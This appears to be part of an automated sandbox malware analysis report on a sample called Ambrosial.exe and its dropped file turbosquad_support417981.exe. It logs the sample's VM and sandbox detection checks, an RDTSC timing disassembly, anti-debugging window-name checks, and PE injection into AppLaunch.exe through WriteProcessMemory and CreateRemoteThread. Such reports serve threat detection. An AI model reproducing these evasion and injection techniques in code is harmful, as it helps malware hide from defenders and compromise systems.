              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Query firmware table information (likely to detect VMs)Show sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Tries to detect virtualization through RDTSC time measurementsShow sources
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeRDTSC instruction interceptor: First address: 00007FFC6FB51F0F second address: 00007FFC6FB51F90 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov dword ptr [esp+28h], eax 0x0000000e dec eax 0x0000000f mov eax, dword ptr [esp+30h] 0x00000013 dec eax 0x00000014 mov ecx, dword ptr [esp+28h] 0x00000018 dec eax 0x00000019 sub ecx, eax 0x0000001b dec eax 0x0000001c mov eax, ecx 0x0000001e dec eax 0x0000001f add esp, 48h 0x00000022 ret 0x00000023 dec eax 0x00000024 mov dword ptr [00010326h], eax 0x0000002a mov dword ptr [esp+28h], 00000000h 0x00000032 jmp 00007F21A0BC634Ch 0x00000034 mov eax, dword ptr [esp+50h] 0x00000038 cmp dword ptr [esp+28h], eax 0x0000003c jnl 00007F21A0BC6384h 0x0000003e rdtsc
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7088Thread sleep time: -17524406870024063s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeWindow / User API: threadDelayed 808Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 7237Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 1415Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: WerFault.exe, 00000007.00000003.357268206.000000000466F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[&
              Source: WerFault.exe, 00000007.00000002.363345368.000000000466F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
              Source: WerFault.exe, 00000007.00000002.363004473.0000000004620000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeSystem information queried: ModuleInformationJump to behavior

              Anti Debugging:

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 505A008Jump to behavior
              Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSIONShow sources
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeMessage posted: Message id: QUERYENDSESSIONJump to behavior
              .NET source code references suspicious native API functionsShow sources
              Source: Ambrosial.exe.0.dr, Ambrosial/Ambrosial/Utils.csReference to suspicious API methods: ('VirtualAllocEx', 'VirtualAllocEx@kernel32.dll'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('GetProcAddress', 'GetProcAddress@kernel32'), ('CreateRemoteThread', 'CreateRemoteThread@kernel32.dll'), ('OpenProcess', 'OpenProcess@kernel32.dll')
              .NET source code contains process injectorShow sources
              Source: Ambrosial.exe.0.dr, Ambrosial/Ambrosial/Utils.cs.Net Code: inject contains WriteProcessMemory and CreateRemoteThread reference
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe 'C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe' Jump to behavior
              Source: C:\Users\user\Desktop\Ambrosial.exeProcess created: C:\Users\user\AppData\Local\Temp\Ambrosial.exe 'C:\Users\user\AppData\Local\Temp\Ambrosial.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
              Source: turbosquad_support417981.exe, 00000002.00000000.333636504.0000000001430000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: turbosquad_support417981.exe, 00000002.00000000.333636504.0000000001430000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: turbosquad_support417981.exe, 00000002.00000000.333636504.0000000001430000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: turbosquad_support417981.exe, 00000002.00000000.333636504.0000000001430000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ambrosial.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Azonix.otf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Azonix.otf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Azonix.otf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OpenSansLight.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OpenSansLight.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\OpenSansLight.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
